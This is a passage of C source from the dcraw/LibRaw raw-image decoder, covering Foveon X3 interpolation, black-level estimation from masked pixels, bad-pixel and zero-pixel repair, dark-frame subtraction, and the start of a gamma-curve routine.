for (i=range[0]; i <= range[1]; i++) {
sum += val = pix[i*4] + (pix[i*4]-pix[(i-1)*4]) * cfilt;
if (min > val) min = val;
if (max < val) max = val;
}
if (range[1] - range[0] == 1) return sum/2;
return (sum - min - max) / (range[1] - range[0] - 1);
}
short * CLASS foveon_make_curve (double max, double mul, double filt)
{
short *curve;
unsigned i, size;
double x;
if (!filt) filt = 0.8;
size = 4*M_PI*max / filt;
if (size == UINT_MAX) size--;
curve = (short *) calloc (size+1, sizeof *curve);
merror (curve, "foveon_make_curve()");
curve[0] = size;
for (i=0; i < size; i++) {
x = i*filt/max/4;
curve[i+1] = (cos(x)+1)/2 * tanh(i*filt/mul) * mul + 0.5;
}
return curve;
}
void CLASS foveon_make_curves
(short **curvep, float dq[3], float div[3], float filt)
{
double mul[3], max=0;
int c;
FORC3 mul[c] = dq[c]/div[c];
FORC3 if (max < mul[c]) max = mul[c];
FORC3 curvep[c] = foveon_make_curve (max, mul[c], filt);
}
int CLASS foveon_apply_curve (short *curve, int i)
{
if (abs(i) >= curve[0]) return 0;
return i < 0 ? -curve[1-i] : curve[1+i];
}
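/*
   foveon_interpolate(): the full Foveon X3 pipeline - dark-drift and
   spatial-gain correction, colour transformation built from the CAMF
   matrices, bad-pixel repair, red sharpening, highlight linearisation,
   chroma smoothing against a 1/4-scale image, and finally cropping to
   the active area.
 */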
#define image ((short (*)[4]) image)
void CLASS foveon_interpolate()
{
static const short hood[] = { -1,-1, -1,0, -1,1, 0,-1, 0,1, 1,-1, 1,0, 1,1 };
short *pix, prev[3], *curve[8], (*shrink)[3];
float cfilt=0, ddft[3][3][2], ppm[3][3][3];
float cam_xyz[3][3], correct[3][3], last[3][3], trans[3][3];
float chroma_dq[3], color_dq[3], diag[3][3], div[3];
float (*black)[3], (*sgain)[3], (*sgrow)[3];
float fsum[3], val, frow, num;
int row, col, c, i, j, diff, sgx, irow, sum, min, max, limit;
int dscr[2][2], dstb[4], (*smrow[7])[3], total[4], ipix[3];
int work[3][3], smlast, smred, smred_p=0, dev[3];
int satlev[3], keep[4], active[4];
unsigned dim[3], *badpix;
double dsum=0, trsum[3];
char str[128];
const char* cp;
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Foveon interpolation...\n"));
#endif
foveon_load_camf();
foveon_fixed (dscr, 4, "DarkShieldColRange");
foveon_fixed (ppm[0][0], 27, "PostPolyMatrix");
foveon_fixed (satlev, 3, "SaturationLevel");
foveon_fixed (keep, 4, "KeepImageArea");
foveon_fixed (active, 4, "ActiveImageArea");
foveon_fixed (chroma_dq, 3, "ChromaDQ");
foveon_fixed (color_dq, 3,
foveon_camf_param ("IncludeBlocks", "ColorDQ") ?
"ColorDQ" : "ColorDQCamRGB");
if (foveon_camf_param ("IncludeBlocks", "ColumnFilter"))
foveon_fixed (&cfilt, 1, "ColumnFilter");
memset (ddft, 0, sizeof ddft);
if (!foveon_camf_param ("IncludeBlocks", "DarkDrift")
|| !foveon_fixed (ddft[1][0], 12, "DarkDrift"))
for (i=0; i < 2; i++) {
foveon_fixed (dstb, 4, i ? "DarkShieldBottom":"DarkShieldTop");
for (row = dstb[1]; row <= dstb[3]; row++)
for (col = dstb[0]; col <= dstb[2]; col++)
FORC3 ddft[i+1][c][1] += (short) image[row*width+col][c];
FORC3 ddft[i+1][c][1] /= (dstb[3]-dstb[1]+1) * (dstb[2]-dstb[0]+1);
}
if (!(cp = foveon_camf_param ("WhiteBalanceIlluminants", model2)))
{
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: Invalid white balance \"%s\"\n"), ifname, model2);
#endif
return; }
foveon_fixed (cam_xyz, 9, cp);
foveon_fixed (correct, 9,
foveon_camf_param ("WhiteBalanceCorrections", model2));
memset (last, 0, sizeof last);
for (i=0; i < 3; i++)
for (j=0; j < 3; j++)
FORC3 last[i][j] += correct[i][c] * cam_xyz[c][j];
#define LAST(x,y) last[(i+x)%3][(c+y)%3]
for (i=0; i < 3; i++)
FORC3 diag[c][i] = LAST(1,1)*LAST(2,2) - LAST(1,2)*LAST(2,1);
#undef LAST
FORC3 div[c] = diag[c][0]*0.3127 + diag[c][1]*0.329 + diag[c][2]*0.3583;
sprintf (str, "%sRGBNeutral", model2);
if (foveon_camf_param ("IncludeBlocks", str))
foveon_fixed (div, 3, str);
num = 0;
FORC3 if (num < div[c]) num = div[c];
FORC3 div[c] /= num;
memset (trans, 0, sizeof trans);
for (i=0; i < 3; i++)
for (j=0; j < 3; j++)
FORC3 trans[i][j] += rgb_cam[i][c] * last[c][j] * div[j];
FORC3 trsum[c] = trans[c][0] + trans[c][1] + trans[c][2];
dsum = (6*trsum[0] + 11*trsum[1] + 3*trsum[2]) / 20;
for (i=0; i < 3; i++)
FORC3 last[i][c] = trans[i][c] * dsum / trsum[i];
memset (trans, 0, sizeof trans);
for (i=0; i < 3; i++)
for (j=0; j < 3; j++)
FORC3 trans[i][j] += (i==c ? 32 : -1) * last[c][j] / 30;
foveon_make_curves (curve, color_dq, div, cfilt);
FORC3 chroma_dq[c] /= 3;
foveon_make_curves (curve+3, chroma_dq, div, cfilt);
FORC3 dsum += chroma_dq[c] / div[c];
curve[6] = foveon_make_curve (dsum, dsum, cfilt);
curve[7] = foveon_make_curve (dsum*2, dsum*2, cfilt);
sgain = (float (*)[3]) foveon_camf_matrix (dim, "SpatialGain");
if (!sgain) return;
sgrow = (float (*)[3]) calloc (dim[1], sizeof *sgrow);
sgx = (width + dim[1]-2) / (dim[1]-1);
black = (float (*)[3]) calloc (height, sizeof *black);
for (row=0; row < height; row++) {
for (i=0; i < 6; i++)
((float *)ddft[0])[i] = ((float *)ddft[1])[i] +
row / (height-1.0) * (((float *)ddft[2])[i] - ((float *)ddft[1])[i]);
FORC3 black[row][c] =
( foveon_avg (image[row*width]+c, dscr[0], cfilt) +
foveon_avg (image[row*width]+c, dscr[1], cfilt) * 3
- ddft[0][c][0] ) / 4 - ddft[0][c][1];
}
memcpy (black, black+8, sizeof *black*8);
memcpy (black+height-11, black+height-22, 11*sizeof *black);
memcpy (last, black, sizeof last);
for (row=1; row < height-1; row++) {
FORC3 if (last[1][c] > last[0][c]) {
if (last[1][c] > last[2][c])
black[row][c] = (last[0][c] > last[2][c]) ? last[0][c]:last[2][c];
} else
if (last[1][c] < last[2][c])
black[row][c] = (last[0][c] < last[2][c]) ? last[0][c]:last[2][c];
memmove (last, last+1, 2*sizeof last[0]);
memcpy (last[2], black[row+1], sizeof last[2]);
}
FORC3 black[row][c] = (last[0][c] + last[1][c])/2;
FORC3 black[0][c] = (black[1][c] + black[3][c])/2;
val = 1 - exp(-1/24.0);
memcpy (fsum, black, sizeof fsum);
for (row=1; row < height; row++)
FORC3 fsum[c] += black[row][c] =
(black[row][c] - black[row-1][c])*val + black[row-1][c];
memcpy (last[0], black[height-1], sizeof last[0]);
FORC3 fsum[c] /= height;
for (row = height; row--; )
FORC3 last[0][c] = black[row][c] =
(black[row][c] - fsum[c] - last[0][c])*val + last[0][c];
memset (total, 0, sizeof total);
for (row=2; row < height; row+=4)
for (col=2; col < width; col+=4) {
FORC3 total[c] += (short) image[row*width+col][c];
total[3]++;
}
for (row=0; row < height; row++)
FORC3 black[row][c] += fsum[c]/2 + total[c]/(total[3]*100.0);
for (row=0; row < height; row++) {
for (i=0; i < 6; i++)
((float *)ddft[0])[i] = ((float *)ddft[1])[i] +
row / (height-1.0) * (((float *)ddft[2])[i] - ((float *)ddft[1])[i]);
pix = image[row*width];
memcpy (prev, pix, sizeof prev);
frow = row / (height-1.0) * (dim[2]-1);
if ((irow = frow) == dim[2]-1) irow--;
frow -= irow;
for (i=0; i < dim[1]; i++)
FORC3 sgrow[i][c] = sgain[ irow *dim[1]+i][c] * (1-frow) +
sgain[(irow+1)*dim[1]+i][c] * frow;
for (col=0; col < width; col++) {
FORC3 {
diff = pix[c] - prev[c];
prev[c] = pix[c];
ipix[c] = pix[c] + floor ((diff + (diff*diff >> 14)) * cfilt
- ddft[0][c][1] - ddft[0][c][0] * ((float) col/width - 0.5)
- black[row][c] );
}
FORC3 {
work[0][c] = ipix[c] * ipix[c] >> 14;
work[2][c] = ipix[c] * work[0][c] >> 14;
work[1][2-c] = ipix[(c+1) % 3] * ipix[(c+2) % 3] >> 14;
}
FORC3 {
for (val=i=0; i < 3; i++)
for ( j=0; j < 3; j++)
val += ppm[c][i][j] * work[i][j];
ipix[c] = floor ((ipix[c] + floor(val)) *
( sgrow[col/sgx ][c] * (sgx - col%sgx) +
sgrow[col/sgx+1][c] * (col%sgx) ) / sgx / div[c]);
if (ipix[c] > 32000) ipix[c] = 32000;
pix[c] = ipix[c];
}
pix += 4;
}
}
free (black);
free (sgrow);
free (sgain);
if ((badpix = (unsigned *) foveon_camf_matrix (dim, "BadPixels"))) {
for (i=0; i < dim[0]; i++) {
col = (badpix[i] >> 8 & 0xfff) - keep[0];
row = (badpix[i] >> 20 ) - keep[1];
if ((unsigned)(row-1) > height-3 || (unsigned)(col-1) > width-3)
continue;
memset (fsum, 0, sizeof fsum);
for (sum=j=0; j < 8; j++)
if (badpix[i] & (1 << j)) {
FORC3 fsum[c] += (short)
image[(row+hood[j*2])*width+col+hood[j*2+1]][c];
sum++;
}
if (sum) FORC3 image[row*width+col][c] = fsum[c]/sum;
}
free (badpix);
}
/* Array for 5x5 Gaussian averaging of red values */
smrow[6] = (int (*)[3]) calloc (width*5, sizeof **smrow);
merror (smrow[6], "foveon_interpolate()");
for (i=0; i < 5; i++)
smrow[i] = smrow[6] + i*width;
/* Sharpen the reds against these Gaussian averages */
for (smlast=-1, row=2; row < height-2; row++) {
while (smlast < row+2) {
for (i=0; i < 6; i++)
smrow[(i+5) % 6] = smrow[i];
pix = image[++smlast*width+2];
for (col=2; col < width-2; col++) {
smrow[4][col][0] =
(pix[0]*6 + (pix[-4]+pix[4])*4 + pix[-8]+pix[8] + 8) >> 4;
pix += 4;
}
}
pix = image[row*width+2];
for (col=2; col < width-2; col++) {
smred = ( 6 * smrow[2][col][0]
+ 4 * (smrow[1][col][0] + smrow[3][col][0])
+ smrow[0][col][0] + smrow[4][col][0] + 8 ) >> 4;
if (col == 2)
smred_p = smred;
i = pix[0] + ((pix[0] - ((smred*7 + smred_p) >> 3)) >> 3);
if (i > 32000) i = 32000;
pix[0] = i;
smred_p = smred;
pix += 4;
}
}
/* Adjust the brighter pixels for better linearity */
min = 0xffff;
FORC3 {
i = satlev[c] / div[c];
if (min > i) min = i;
}
limit = min * 9 >> 4;
for (pix=image[0]; pix < image[height*width]; pix+=4) {
if (pix[0] <= limit || pix[1] <= limit || pix[2] <= limit)
continue;
min = max = pix[0];
for (c=1; c < 3; c++) {
if (min > pix[c]) min = pix[c];
if (max < pix[c]) max = pix[c];
}
if (min >= limit*2) {
pix[0] = pix[1] = pix[2] = max;
} else {
i = 0x4000 - ((min - limit) << 14) / limit;
i = 0x4000 - (i*i >> 14);
i = i*i >> 14;
FORC3 pix[c] += (max - pix[c]) * i >> 14;
}
}
/*
Because photons that miss one detector often hit another,
the sum R+G+B is much less noisy than the individual colors.
So smooth the hues without smoothing the total.
*/
for (smlast=-1, row=2; row < height-2; row++) {
while (smlast < row+2) {
for (i=0; i < 6; i++)
smrow[(i+5) % 6] = smrow[i];
pix = image[++smlast*width+2];
for (col=2; col < width-2; col++) {
FORC3 smrow[4][col][c] = (pix[c-4]+2*pix[c]+pix[c+4]+2) >> 2;
pix += 4;
}
}
pix = image[row*width+2];
for (col=2; col < width-2; col++) {
FORC3 dev[c] = -foveon_apply_curve (curve[7], pix[c] -
((smrow[1][col][c] + 2*smrow[2][col][c] + smrow[3][col][c]) >> 2));
sum = (dev[0] + dev[1] + dev[2]) >> 3;
FORC3 pix[c] += dev[c] - sum;
pix += 4;
}
}
for (smlast=-1, row=2; row < height-2; row++) {
while (smlast < row+2) {
for (i=0; i < 6; i++)
smrow[(i+5) % 6] = smrow[i];
pix = image[++smlast*width+2];
for (col=2; col < width-2; col++) {
FORC3 smrow[4][col][c] =
(pix[c-8]+pix[c-4]+pix[c]+pix[c+4]+pix[c+8]+2) >> 2;
pix += 4;
}
}
pix = image[row*width+2];
for (col=2; col < width-2; col++) {
for (total[3]=375, sum=60, c=0; c < 3; c++) {
for (total[c]=i=0; i < 5; i++)
total[c] += smrow[i][col][c];
total[3] += total[c];
sum += pix[c];
}
if (sum < 0) sum = 0;
j = total[3] > 375 ? (sum << 16) / total[3] : sum * 174;
FORC3 pix[c] += foveon_apply_curve (curve[6],
((j*total[c] + 0x8000) >> 16) - pix[c]);
pix += 4;
}
}
/* Transform the image to a different colorspace */
for (pix=image[0]; pix < image[height*width]; pix+=4) {
FORC3 pix[c] -= foveon_apply_curve (curve[c], pix[c]);
sum = (pix[0]+pix[1]+pix[1]+pix[2]) >> 2;
FORC3 pix[c] -= foveon_apply_curve (curve[c], pix[c]-sum);
FORC3 {
for (dsum=i=0; i < 3; i++)
dsum += trans[c][i] * pix[i];
if (dsum < 0) dsum = 0;
if (dsum > 24000) dsum = 24000;
ipix[c] = dsum + 0.5;
}
FORC3 pix[c] = ipix[c];
}
/* Smooth the image bottom-to-top and save at 1/4 scale */
shrink = (short (*)[3]) calloc ((height/4), (width/4)*sizeof *shrink);
merror (shrink, "foveon_interpolate()");
for (row = height/4; row--; )
for (col=0; col < width/4; col++) {
ipix[0] = ipix[1] = ipix[2] = 0;
for (i=0; i < 4; i++)
for (j=0; j < 4; j++)
FORC3 ipix[c] += image[(row*4+i)*width+col*4+j][c];
FORC3
if (row+2 > height/4)
shrink[row*(width/4)+col][c] = ipix[c] >> 4;
else
shrink[row*(width/4)+col][c] =
(shrink[(row+1)*(width/4)+col][c]*1840 + ipix[c]*141 + 2048) >> 12;
}
/* From the 1/4-scale image, smooth right-to-left */
for (row=0; row < (height & ~3); row++) {
ipix[0] = ipix[1] = ipix[2] = 0;
if ((row & 3) == 0)
for (col = width & ~3 ; col--; )
FORC3 smrow[0][col][c] = ipix[c] =
(shrink[(row/4)*(width/4)+col/4][c]*1485 + ipix[c]*6707 + 4096) >> 13;
/* Then smooth left-to-right */
ipix[0] = ipix[1] = ipix[2] = 0;
for (col=0; col < (width & ~3); col++)
FORC3 smrow[1][col][c] = ipix[c] =
(smrow[0][col][c]*1485 + ipix[c]*6707 + 4096) >> 13;
/* Smooth top-to-bottom */
if (row == 0)
memcpy (smrow[2], smrow[1], sizeof **smrow * width);
else
for (col=0; col < (width & ~3); col++)
FORC3 smrow[2][col][c] =
(smrow[2][col][c]*6707 + smrow[1][col][c]*1485 + 4096) >> 13;
/* Adjust the chroma toward the smooth values */
for (col=0; col < (width & ~3); col++) {
for (i=j=30, c=0; c < 3; c++) {
i += smrow[2][col][c];
j += image[row*width+col][c];
}
j = (j << 16) / i;
for (sum=c=0; c < 3; c++) {
ipix[c] = foveon_apply_curve (curve[c+3],
((smrow[2][col][c] * j + 0x8000) >> 16) - image[row*width+col][c]);
sum += ipix[c];
}
sum >>= 3;
FORC3 {
i = image[row*width+col][c] + ipix[c] - sum;
if (i < 0) i = 0;
image[row*width+col][c] = i;
}
}
}
free (shrink);
free (smrow[6]);
for (i=0; i < 8; i++)
free (curve[i]);
/* Trim off the black border */
active[1] -= keep[1];
active[3] -= 2;
i = active[2] - active[0];
for (row=0; row < active[3]-active[1]; row++)
memcpy (image[row*i], image[(row+active[1])*width+active[0]],
i * sizeof *image);
width = i;
height = row;
}
#undef image
/* RESTRICTED code ends here */
//@out COMMON
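/*
   crop_masked_pixels(): copies the active area out of the raw frame
   (in the non-LibRaw build) and averages the optically masked border
   regions described by mask[][] to estimate the per-channel black
   levels cblack[0..3].
 */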
void CLASS crop_masked_pixels()
{
int row, col;
unsigned
#ifndef LIBRAW_LIBRARY_BUILD
r, raw_pitch = raw_width*2,
c, m, mblack[8], zero, val;
#else
c, m, zero, val;
#define mblack imgdata.color.black_stat
#endif
#ifndef LIBRAW_LIBRARY_BUILD
if (load_raw == &CLASS phase_one_load_raw ||
load_raw == &CLASS phase_one_load_raw_c)
phase_one_correct();
if (fuji_width) {
for (row=0; row < raw_height-top_margin*2; row++) {
for (col=0; col < fuji_width << !fuji_layout; col++) {
if (fuji_layout) {
r = fuji_width - 1 - col + (row >> 1);
c = col + ((row+1) >> 1);
} else {
r = fuji_width - 1 + row - (col >> 1);
c = row + ((col+1) >> 1);
}
if (r < height && c < width)
BAYER(r,c) = RAW(row+top_margin,col+left_margin);
}
}
} else {
for (row=0; row < height; row++)
for (col=0; col < width; col++)
BAYER2(row,col) = RAW(row+top_margin,col+left_margin);
}
#endif
if (mask[0][3] > 0) goto mask_set;
if (load_raw == &CLASS canon_load_raw ||
load_raw == &CLASS lossless_jpeg_load_raw) {
mask[0][1] = mask[1][1] += 2;
mask[0][3] -= 2;
goto sides;
}
if (load_raw == &CLASS canon_600_load_raw ||
load_raw == &CLASS sony_load_raw ||
(load_raw == &CLASS eight_bit_load_raw && strncmp(model,"DC2",3)) ||
load_raw == &CLASS kodak_262_load_raw ||
(load_raw == &CLASS packed_load_raw && (load_flags & 32))) {
sides:
mask[0][0] = mask[1][0] = top_margin;
mask[0][2] = mask[1][2] = top_margin+height;
mask[0][3] += left_margin;
mask[1][1] += left_margin+width;
mask[1][3] += raw_width;
}
if (load_raw == &CLASS nokia_load_raw) {
mask[0][2] = top_margin;
mask[0][3] = width;
}
#ifdef LIBRAW_LIBRARY_BUILD
if (load_raw == &CLASS broadcom_load_raw) {
mask[0][2] = top_margin;
mask[0][3] = width;
}
#endif
mask_set:
memset (mblack, 0, sizeof mblack);
for (zero=m=0; m < 8; m++)
for (row=MAX(mask[m][0],0); row < MIN(mask[m][2],raw_height); row++)
for (col=MAX(mask[m][1],0); col < MIN(mask[m][3],raw_width); col++) {
c = FC(row-top_margin,col-left_margin);
mblack[c] += val = raw_image[(row)*raw_pitch/2+(col)];
mblack[4+c]++;
zero += !val;
}
if (load_raw == &CLASS canon_600_load_raw && width < raw_width) {
black = (mblack[0]+mblack[1]+mblack[2]+mblack[3]) /
(mblack[4]+mblack[5]+mblack[6]+mblack[7]) - 4;
#ifndef LIBRAW_LIBRARY_BUILD
canon_600_correct();
#endif
} else if (zero < mblack[4] && mblack[5] && mblack[6] && mblack[7]) {
FORC4 cblack[c] = mblack[c] / mblack[4+c];
black = cblack[4] = cblack[5] = cblack[6] = 0;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
#undef mblack
#endif
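/*
   remove_zeroes(): replaces zero-valued Bayer samples with the average
   of same-colour neighbours within a 5x5 window.
 */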
void CLASS remove_zeroes()
{
unsigned row, col, tot, n, r, c;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_REMOVE_ZEROES,0,2);
#endif
for (row=0; row < height; row++)
for (col=0; col < width; col++)
if (BAYER(row,col) == 0) {
tot = n = 0;
for (r = row-2; r <= row+2; r++)
for (c = col-2; c <= col+2; c++)
if (r < height && c < width &&
FC(r,c) == FC(row,col) && BAYER(r,c))
tot += (n++,BAYER(r,c));
if (n) BAYER(row,col) = tot/n;
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_REMOVE_ZEROES,1,2);
#endif
}
//@end COMMON
/* @out FILEIO
#include <math.h>
#define CLASS LibRaw::
#include "libraw/libraw_types.h"
#define LIBRAW_LIBRARY_BUILD
#include "libraw/libraw.h"
#include "internal/defines.h"
#include "internal/var_defines.h"
@end FILEIO */
// @out FILEIO
/*
   Seach from the current directory up to the root looking for
   a ".badpixels" file, and fix those pixels now.
a ".badpixels" file, and fix those pixels now.
*/
void CLASS bad_pixels (const char *cfname)
{
FILE *fp=NULL;
#ifndef LIBRAW_LIBRARY_BUILD
char *fname, *cp, line[128];
int len, time, row, col, r, c, rad, tot, n, fixed=0;
#else
char *cp, line[128];
int time, row, col, r, c, rad, tot, n;
#ifdef DCRAW_VERBOSE
int fixed = 0;
#endif
#endif
if (!filters) return;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_BAD_PIXELS,0,2);
#endif
if (cfname)
fp = fopen (cfname, "r");
// @end FILEIO
else {
for (len=32 ; ; len *= 2) {
fname = (char *) malloc (len);
if (!fname) return;
if (getcwd (fname, len-16)) break;
free (fname);
if (errno != ERANGE) return;
}
#if defined(WIN32) || defined(DJGPP)
if (fname[1] == ':')
memmove (fname, fname+2, len-2);
for (cp=fname; *cp; cp++)
if (*cp == '\\') *cp = '/';
#endif
cp = fname + strlen(fname);
if (cp[-1] == '/') cp--;
while (*fname == '/') {
strcpy (cp, "/.badpixels");
if ((fp = fopen (fname, "r"))) break;
if (cp == fname) break;
while (*--cp != '/');
}
free (fname);
}
// @out FILEIO
if (!fp)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_BADPIXELMAP;
#endif
return;
}
while (fgets (line, 128, fp)) {
cp = strchr (line, '#');
if (cp) *cp = 0;
if (sscanf (line, "%d %d %d", &col, &row, &time) != 3) continue;
if ((unsigned) col >= width || (unsigned) row >= height) continue;
if (time > timestamp) continue;
for (tot=n=0, rad=1; rad < 3 && n==0; rad++)
for (r = row-rad; r <= row+rad; r++)
for (c = col-rad; c <= col+rad; c++)
if ((unsigned) r < height && (unsigned) c < width &&
(r != row || c != col) && fcol(r,c) == fcol(row,col)) {
tot += BAYER2(r,c);
n++;
}
BAYER2(row,col) = tot/n;
#ifdef DCRAW_VERBOSE
if (verbose) {
if (!fixed++)
fprintf (stderr,_("Fixed dead pixels at:"));
fprintf (stderr, " %d,%d", col, row);
}
#endif
}
#ifdef DCRAW_VERBOSE
if (fixed) fputc ('\n', stderr);
#endif
fclose (fp);
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_BAD_PIXELS,1,2);
#endif
}
void CLASS subtract (const char *fname)
{
FILE *fp;
int dim[3]={0,0,0}, comment=0, number=0, error=0, nd=0, c, row, col;
ushort *pixel;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_DARK_FRAME,0,2);
#endif
if (!(fp = fopen (fname, "rb"))) {
#ifdef DCRAW_VERBOSE
perror (fname);
#endif
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_BAD_DARKFRAME_FILE;
#endif
return;
}
if (fgetc(fp) != 'P' || fgetc(fp) != '5') error = 1;
while (!error && nd < 3 && (c = fgetc(fp)) != EOF) {
if (c == '#') comment = 1;
if (c == '\n') comment = 0;
if (comment) continue;
if (isdigit(c)) number = 1;
if (number) {
if (isdigit(c)) dim[nd] = dim[nd]*10 + c -'0';
else if (isspace(c)) {
number = 0; nd++;
} else error = 1;
}
}
if (error || nd < 3) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s is not a valid PGM file!\n"), fname);
#endif
fclose (fp); return;
} else if (dim[0] != width || dim[1] != height || dim[2] != 65535) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s has the wrong dimensions!\n"), fname);
#endif
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_BAD_DARKFRAME_DIM;
#endif
fclose (fp); return;
}
pixel = (ushort *) calloc (width, sizeof *pixel);
merror (pixel, "subtract()");
for (row=0; row < height; row++) {
fread (pixel, 2, width, fp);
for (col=0; col < width; col++)
BAYER(row,col) = MAX (BAYER(row,col) - ntohs(pixel[col]), 0);
}
free (pixel);
fclose (fp);
memset (cblack, 0, sizeof cblack);
black = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_DARK_FRAME,1,2);
#endif
}
//@end FILEIO
//@out COMMON
static const uchar xlat[2][256] = {
{ 0xc1,0xbf,0x6d,0x0d,0x59,0xc5,0x13,0x9d,0x83,0x61,0x6b,0x4f,0xc7,0x7f,0x3d,0x3d,
0x53,0x59,0xe3,0xc7,0xe9,0x2f,0x95,0xa7,0x95,0x1f,0xdf,0x7f,0x2b,0x29,0xc7,0x0d,
0xdf,0x07,0xef,0x71,0x89,0x3d,0x13,0x3d,0x3b,0x13,0xfb,0x0d,0x89,0xc1,0x65,0x1f,
0xb3,0x0d,0x6b,0x29,0xe3,0xfb,0xef,0xa3,0x6b,0x47,0x7f,0x95,0x35,0xa7,0x47,0x4f,
0xc7,0xf1,0x59,0x95,0x35,0x11,0x29,0x61,0xf1,0x3d,0xb3,0x2b,0x0d,0x43,0x89,0xc1,
0x9d,0x9d,0x89,0x65,0xf1,0xe9,0xdf,0xbf,0x3d,0x7f,0x53,0x97,0xe5,0xe9,0x95,0x17,
0x1d,0x3d,0x8b,0xfb,0xc7,0xe3,0x67,0xa7,0x07,0xf1,0x71,0xa7,0x53,0xb5,0x29,0x89,
0xe5,0x2b,0xa7,0x17,0x29,0xe9,0x4f,0xc5,0x65,0x6d,0x6b,0xef,0x0d,0x89,0x49,0x2f,
0xb3,0x43,0x53,0x65,0x1d,0x49,0xa3,0x13,0x89,0x59,0xef,0x6b,0xef,0x65,0x1d,0x0b,
0x59,0x13,0xe3,0x4f,0x9d,0xb3,0x29,0x43,0x2b,0x07,0x1d,0x95,0x59,0x59,0x47,0xfb,
0xe5,0xe9,0x61,0x47,0x2f,0x35,0x7f,0x17,0x7f,0xef,0x7f,0x95,0x95,0x71,0xd3,0xa3,
0x0b,0x71,0xa3,0xad,0x0b,0x3b,0xb5,0xfb,0xa3,0xbf,0x4f,0x83,0x1d,0xad,0xe9,0x2f,
0x71,0x65,0xa3,0xe5,0x07,0x35,0x3d,0x0d,0xb5,0xe9,0xe5,0x47,0x3b,0x9d,0xef,0x35,
0xa3,0xbf,0xb3,0xdf,0x53,0xd3,0x97,0x53,0x49,0x71,0x07,0x35,0x61,0x71,0x2f,0x43,
0x2f,0x11,0xdf,0x17,0x97,0xfb,0x95,0x3b,0x7f,0x6b,0xd3,0x25,0xbf,0xad,0xc7,0xc5,
0xc5,0xb5,0x8b,0xef,0x2f,0xd3,0x07,0x6b,0x25,0x49,0x95,0x25,0x49,0x6d,0x71,0xc7 },
{ 0xa7,0xbc,0xc9,0xad,0x91,0xdf,0x85,0xe5,0xd4,0x78,0xd5,0x17,0x46,0x7c,0x29,0x4c,
0x4d,0x03,0xe9,0x25,0x68,0x11,0x86,0xb3,0xbd,0xf7,0x6f,0x61,0x22,0xa2,0x26,0x34,
0x2a,0xbe,0x1e,0x46,0x14,0x68,0x9d,0x44,0x18,0xc2,0x40,0xf4,0x7e,0x5f,0x1b,0xad,
0x0b,0x94,0xb6,0x67,0xb4,0x0b,0xe1,0xea,0x95,0x9c,0x66,0xdc,0xe7,0x5d,0x6c,0x05,
0xda,0xd5,0xdf,0x7a,0xef,0xf6,0xdb,0x1f,0x82,0x4c,0xc0,0x68,0x47,0xa1,0xbd,0xee,
0x39,0x50,0x56,0x4a,0xdd,0xdf,0xa5,0xf8,0xc6,0xda,0xca,0x90,0xca,0x01,0x42,0x9d,
0x8b,0x0c,0x73,0x43,0x75,0x05,0x94,0xde,0x24,0xb3,0x80,0x34,0xe5,0x2c,0xdc,0x9b,
0x3f,0xca,0x33,0x45,0xd0,0xdb,0x5f,0xf5,0x52,0xc3,0x21,0xda,0xe2,0x22,0x72,0x6b,
0x3e,0xd0,0x5b,0xa8,0x87,0x8c,0x06,0x5d,0x0f,0xdd,0x09,0x19,0x93,0xd0,0xb9,0xfc,
0x8b,0x0f,0x84,0x60,0x33,0x1c,0x9b,0x45,0xf1,0xf0,0xa3,0x94,0x3a,0x12,0x77,0x33,
0x4d,0x44,0x78,0x28,0x3c,0x9e,0xfd,0x65,0x57,0x16,0x94,0x6b,0xfb,0x59,0xd0,0xc8,
0x22,0x36,0xdb,0xd2,0x63,0x98,0x43,0xa1,0x04,0x87,0x86,0xf7,0xa6,0x26,0xbb,0xd6,
0x59,0x4d,0xbf,0x6a,0x2e,0xaa,0x2b,0xef,0xe6,0x78,0xb6,0x4e,0xe0,0x2f,0xdc,0x7c,
0xbe,0x57,0x19,0x32,0x7e,0x2a,0xd0,0xb8,0xba,0x29,0x00,0x3c,0x52,0x7d,0xa8,0x49,
0x3b,0x2d,0xeb,0x25,0x49,0xfa,0xa3,0xaa,0x39,0xa7,0xc5,0xa7,0x50,0x11,0x36,0xfb,
0xc6,0x67,0x4a,0xf5,0xa5,0x12,0x65,0x7e,0xb0,0xdf,0xaf,0x4e,0xb3,0x61,0x7f,0x2f } };
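/*
   gamma_curve(): builds a 64K-entry tone curve made of a linear toe
   joined to a power (or logarithmic) segment.  The first loop bisects
   for the joint point g[2]; mode 0 only stores the solved parameters in
   gamm[], other modes fill curve[] in the forward or inverse direction.
 */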
void CLASS gamma_curve (double pwr, double ts, int mode, int imax)
{
int i;
double g[6], bnd[2]={0,0}, r;
g[0] = pwr;
g[1] = ts;
g[2] = g[3] = g[4] = 0;
bnd[g[1] >= 1] = 1;
if (g[1] && (g[1]-1)*(g[0]-1) <= 0) {
for (i=0; i < 48; i++) {
g[2] = (bnd[0] + bnd[1])/2;
if (g[0]) bnd[(pow(g[2]/g[1],-g[0]) - 1)/g[0] - 1/g[2] > -1] = g[2];
else bnd[g[2]/exp(1-1/g[2]) < g[1]] = g[2];
}
g[3] = g[2] / g[1];
if (g[0]) g[4] = g[2] * (1/g[0] - 1);
}
if (g[0]) g[5] = 1 / (g[1]*SQR(g[3])/2 - g[4]*(1 - g[3]) +
(1 - pow(g[3],1+g[0]))*(1 + g[4])/(1 + g[0])) - 1;
else g[5] = 1 / (g[1]*SQR(g[3])/2 + 1
- g[2] - g[3] - g[2]*g[3]*(log(g[3]) - 1)) - 1;
if (!mode--) {
memcpy (gamm, g, sizeof gamm);
